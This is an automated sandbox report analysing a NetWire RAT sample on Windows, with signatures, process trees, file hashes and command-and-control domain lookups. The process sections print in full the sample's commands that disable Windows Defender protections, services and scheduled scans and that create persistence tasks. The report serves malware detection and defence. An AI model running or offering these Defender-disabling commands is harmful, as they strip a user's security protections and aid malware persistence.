Malware Analysis Report

2025-05-06 00:03

Sample ID 250420-bh9wjs1rx3
Target 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer
SHA256 00bdd3b2ccc6b339809704a8b12920327b76e6cdd9d0d1beddc38155a4532579
Tags
netwire botnet discovery rat stealer defense_evasion evasion trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

00bdd3b2ccc6b339809704a8b12920327b76e6cdd9d0d1beddc38155a4532579

Threat Level: Known bad

The file 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer was found to be: Known bad.

Malicious Activity Summary

netwire botnet discovery rat stealer defense_evasion evasion trojan

Modifies Windows Defender Real-time Protection settings

Modifies security service

NetWire RAT payload

Modifies Windows Defender DisableAntiSpyware settings

Netwire family

Netwire

Looks for VirtualBox Guest Additions in registry

Looks for VMWare Tools registry key

Executes dropped EXE

Checks computer location settings

Checks BIOS information in registry

Loads dropped DLL

Maps connected drives based on registry

Modifies Security services

Suspicious use of SetThreadContext

Enumerates physical storage devices

Unsigned PE

System Location Discovery: System Language Discovery

NSIS installer

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Scheduled Task/Job: Scheduled Task

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-04-20 01:09

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2025-04-20 01:09

Reported

2025-04-20 01:12

Platform

win11-20250410-en

Max time kernel

1s

Max time network

133s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe"

Signatures

NetWire RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Netwire

botnet stealer netwire

Netwire family

netwire

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\WinDriversQt.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\WinDriversQt.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4896 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\WinDriversQt.exe
PID 4896 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\WinDriversQt.exe
PID 4896 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\WinDriversQt.exe
PID 4896 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe
PID 4896 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe
PID 4896 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe
PID 1468 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Roaming\WinDriversQt.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Roaming\WinDriversQt.exe C:\Windows\system32\cmd.exe
PID 4896 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe
PID 4896 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe
PID 4896 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe

"C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe"

C:\Users\Admin\AppData\Roaming\WinDriversQt.exe

"C:\Users\Admin\AppData\Roaming\WinDriversQt.exe"

C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe

"C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe"

C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe

"C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B14E.tmp\B14F.tmp\B150.bat C:\Users\Admin\AppData\Roaming\WinDriversQt.exe"

C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe

"C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe"

C:\Users\Admin\AppData\Roaming\nb662-full.exe

"C:\Users\Admin\AppData\Roaming\nb662-full.exe"

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SDgtKxxeaGYFg" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7F10.tmp"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DiFGHpZsWh" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7F0E.tmp"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yBrhLIdmRX" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7F0F.tmp"

C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe

"{path}"

C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe

"{path}"

C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe

"{path}"

C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe

"{path}"

C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe

"{path}"

Network

Country Destination Domain Proto
US 8.8.8.8:53 maelus.mine.nu udp
US 8.8.8.8:53 victoire.dyndns.biz udp

Files

C:\Users\Admin\AppData\Roaming\WinDriversQt.exe

MD5 279205de551b3053fc8b973150577120
SHA1 8a78379b3af83ac4f2b1b07b7f968e2db7d1ea0b
SHA256 1d4070b3c282670191d1c5236ccad902e44e33a4d3211488eb52cd4e5223b159
SHA512 29664cb6ff47e5b0016076f7a3c248ed1deb90150669a4cc7357b7a190bd348372f551a652f92c459190ad479ed646cb7be465c389d039d74c5acb3eb254487b

C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe

MD5 9de85017f17de5b5872d27c4f66ca576
SHA1 abb2c3c99e58e498241f3c5b149821b79dbd1f21
SHA256 0771ac3786c447e25abdbbfd18f67b5c25405a4266add5a227c1d69ff5048ce0
SHA512 1265ab52ae96a97372316e2c0f1e8d648d0de7721d80a48340fb991038b6ffba640602d8592cffaa614db9b4f844b69e1d2988049a117631fe755d55759310e5

C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe

MD5 a5cc020492b0db504a7df2dbfed86cd1
SHA1 11fb92cd5b25dfd3a02220286f49d426b3f9d003
SHA256 e98a538725d3864aff69872345f950c572d4b4b727e7c916c0de37e813dbc03d
SHA512 ac69d9d6d0bc8cd632356b0c9bbc6eac6a91f6ab3ff7b3d1cbcdd5ff86cb0414643e251d2e6893afd614336c056914a815c2114b0fbc685f4a2fa780af1b0115

C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe

MD5 6c18cac0ed1782d322f237f060c4f07d
SHA1 fee4ecc2fc6c2189a81486bfa2d1a8a182100671
SHA256 6443b61c3f5404dbcd4538e7636a9b1d4b6e5b07f38d95fd9a7794f7f30934e2
SHA512 693d607ee51aec95d070fdc52f9ceb6716b6d36cb89184b67394cdca53c4afa9ca8bff761d39cf4290cf24ceaf5542f1868c029ed56341e92f46b9553c8899d9

C:\Users\Admin\AppData\Roaming\nb662-full.exe

MD5 2ea0aa5b989197690e73372dc23ae796
SHA1 497d114039585271b89fe954cea473fe32f33772
SHA256 16c723380e74451ae1e7ca45c4abbc4773d4da194f92817d72ffaaa3da5f66f4
SHA512 20ce64434a4cb0a806216e2647d67167a0c953e23d9ac2f8cfb80bf2c4638271d861463c802af156621a28a5c5d78e1b15c616b2e9ee2189bffeff5f7d25541d

memory/4192-57-0x0000000072D80000-0x0000000073531000-memory.dmp

memory/1300-59-0x00000000056C0000-0x0000000005752000-memory.dmp

memory/3368-58-0x0000000004F70000-0x0000000005516000-memory.dmp

memory/4192-63-0x0000000004FA0000-0x0000000004FAA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\cpudesc.dll

MD5 d25102051b33f61c9f7fb564a4556219
SHA1 c683964c11d5175171bd009cb08f87592c923f85
SHA256 e58e5d1d8da2ea526d0d754b4faad3773021166b0720723efb7b30f1f5075398
SHA512 8828eec31926251d7e51b5bf1050c3519c9b7fca4f978fb6ee0bf18f9642c3460687f10ff79e5892100ecadbf49725711567c348e1dfccb3644bd9ef992a92f0

C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\System.dll

MD5 6f5257c0b8c0ef4d440f4f4fce85fb1b
SHA1 b6ac111dfb0d1fc75ad09c56bde7830232395785
SHA256 b7ccb923387cc346731471b20fc3df1ead13ec8c2e3147353c71bb0bd59bc8b1
SHA512 a3cc27f1efb52fb8ecda54a7c36ada39cefeabb7b16f2112303ea463b0e1a4d745198d413eebb3551e012c84a20dcdf4359e511e51bc3f1a60b13f1e3bad1aa8

memory/3368-96-0x0000000004F10000-0x0000000004F2C000-memory.dmp

memory/1300-97-0x0000000005BD0000-0x0000000005C6C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\LangDLL.dll

MD5 ebd0da54db9f12ffd15206cc24355793
SHA1 910be3bebdde55eb1ce05915a79f01ebdc622786
SHA256 4066a0cbd9f6bb13c0f6fb064d4647ef7bc68a1be3d0caa4460b5ffd9ed1e0e6
SHA512 cee09db96267b1a30477ff074988606bdf35f9a5aa798a9a10029b11c0c347ab42a124320d777acde458828954cc8cf1a489b1673b31d589cdc4f50d4b86659d

C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\UserInfo.dll

MD5 8ef0e4eb7c89cdd2b552de746f5e2a53
SHA1 820f681e7cec409a02b194a487d1c8af1038acf0
SHA256 41293b9f6588e0fbdc8fcf2a9bd8e2b244cd5ff038fc13033378da337219c9dc
SHA512 a68533e8a19637d0d44219549b24baba0dc4824424842f125600fda3edcafc4bb6bb340d57a00815f262d82373b440d58d6e4e5b2ceb29bb3f6bc4cbde66c3c5

memory/4192-72-0x0000000006080000-0x00000000065AC000-memory.dmp

memory/4192-56-0x0000000000510000-0x000000000064A000-memory.dmp

memory/3368-55-0x0000000000020000-0x000000000015A000-memory.dmp

memory/1300-54-0x0000000000C20000-0x0000000000D5C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B14E.tmp\B14F.tmp\B150.bat

MD5 665f21a9b6730aa08e62473e481b8c55
SHA1 717d52e75ac16bf032299828dd61c86af281eb43
SHA256 dcaba420b47b5527bd3761ae8a2b76bbbf387100613b7c2f256cfe9ec58fb579
SHA512 b3c6fe2555613f4f7b30ba434e94421c397008a999ff5c07b5df349c550ef6b4d2a8b831208ad3bb25998bf9d2fe0dbb86414ef23ef9216211ab96373d9b6f1e

memory/1300-45-0x0000000072D8E000-0x0000000072D8F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\nsDialogs.dll

MD5 d9256d9acaecabb20b7e9a1595abfa36
SHA1 ece1cab181dac7729246da1d4494b8daa10c3b70
SHA256 d7b2c55977a541f8d075e48d4e0a82eec79ad247b0ed168c19a8518131acd19c
SHA512 5827cdbfde0e766d1b74ecb22f9614232031da41c21d0f6ff6c9d5dcdfc0adc23e8fd616eb020ab42208932444b5e0cb1e6d6e698bead412eae19624a180b6ff

C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\UAC.dll

MD5 4814167aa1c7ec892e84907094646faa
SHA1 a57a5ecbdfa9a8777a3c587f1acb02b783afc5ee
SHA256 32dd7269abf5a0e5db888e307d9df313e87cef4f1b597965a9d8e00934658822
SHA512 fb1f35e393997ecd2301f371892b59574ee6b666095c3a435336160481f6ef7ed5635c90ce5d2cf88e5ef4a5affb46cb841b7d17e7981bd6e998531193f5d067

memory/4192-114-0x0000000072D80000-0x0000000073531000-memory.dmp

memory/4192-117-0x00000000066B0000-0x00000000066FC000-memory.dmp

memory/1300-116-0x0000000006D90000-0x0000000006DDC000-memory.dmp

memory/3368-115-0x0000000006200000-0x000000000624C000-memory.dmp

memory/3368-118-0x00000000062C0000-0x0000000006326000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp7F0F.tmp

MD5 208344347dd6b0c54f85e66f6aa78480
SHA1 b72f81b8ad0f85e752a57a053eb21a05aadb822c
SHA256 347401de3cfacbbbc16d84ae0f9bdab13166e1ea0abd554fe158a025d18c7613
SHA512 2295c8fba889be0bdd155e30716d3b254642453291bcc74d6c50b663b052a2a86e369977342c3975700b0de0c3de7f956b8364812f47bc0966f5e35d3ca14906

C:\Users\Admin\AppData\Local\Temp\tmp7F10.tmp

MD5 6505475046c7ce0540dc2625534a035b
SHA1 1c7cfd290c88c9876b4a2230bfb15981f53d11fe
SHA256 2dc1c2039d706fb941b02f5854e2c3b9453d1910c9d4e90470cd6289ef35c8e5
SHA512 3ab4e6e39b6cb2a5ec7f4192c185fffa35f1db827ce6fb41f0764e957c8bc931bc9c9e18267aac9a3f464eff120c2086442c61cf827e8e9504b48fa96693374c

C:\Users\Admin\AppData\Local\Temp\tmp7F0E.tmp

MD5 99757558dcf54d4ef129f8ce06ab0abc
SHA1 87a512fd9f09a5333b7edbfbc4525ece25f457f3
SHA256 09629e136aa57495f07732c5cd5e3e04eb9244e2b16d8d6478bc7153a7ae3fd8
SHA512 bf7240d5369b09789a768f8653c6c0ec49b2d3bbc2548b00f0476fa0ce4b33ad3b262e849ee03e25f73202069fd3eea74f13c1f5e8110e206d896ac8bafefdf3

memory/2708-141-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2708-139-0x0000000000400000-0x0000000000425000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\GetFLE.ini

MD5 21533b9e9b48512d41f4766286d9f54c
SHA1 df97ece7c973ebbbf8a10b5ca60aac70e6359540
SHA256 d8c83f60e0b10b9a681336aa2c6776038c9d3f1ca2454e5bb7798a5bdbca4971
SHA512 40327c0b570c039df00d9bbe7d0fd7c8cf8e7376d3b637545b687aa1c53e23e88d8673a9a1ab50e9dbc59ff31921abc3e45de55063c6f5c5af3d2c9b2a9f9d44

C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\InstallOptions.dll

MD5 2a03c4a7ac5ee5e0e0a683949f70971b
SHA1 3bd9877caaea4804c0400420494ad1143179dcec
SHA256 d4f0042d8e7622b7e14395e926dd02edab3cdc77e82d88108b67a4d2cee9229b
SHA512 1942cdb522859f8dba46824786e361794a62e6201279201e1e0e2e07499fb6252933c5661782fccd77291c3650cafb2a7a08eee5431c8238f0da44840ee4c476

memory/4192-137-0x0000000072D80000-0x0000000073531000-memory.dmp

memory/3516-134-0x0000000000400000-0x0000000000425000-memory.dmp

memory/3516-132-0x0000000000400000-0x0000000000425000-memory.dmp

memory/876-130-0x0000000000400000-0x0000000000425000-memory.dmp

memory/876-128-0x0000000000400000-0x0000000000425000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2025-04-20 01:09

Reported

2025-04-20 01:12

Platform

win10v2004-20250314-en

Max time kernel

131s

Max time network

135s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe"

Signatures

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Windows\system32\reg.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A

Modifies security service

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

NetWire RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Netwire

botnet stealer netwire

Netwire family

netwire

Looks for VirtualBox Guest Additions in registry

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe N/A

Looks for VMWare Tools registry key

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe N/A

Modifies Security services

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" C:\Windows\system32\reg.exe N/A
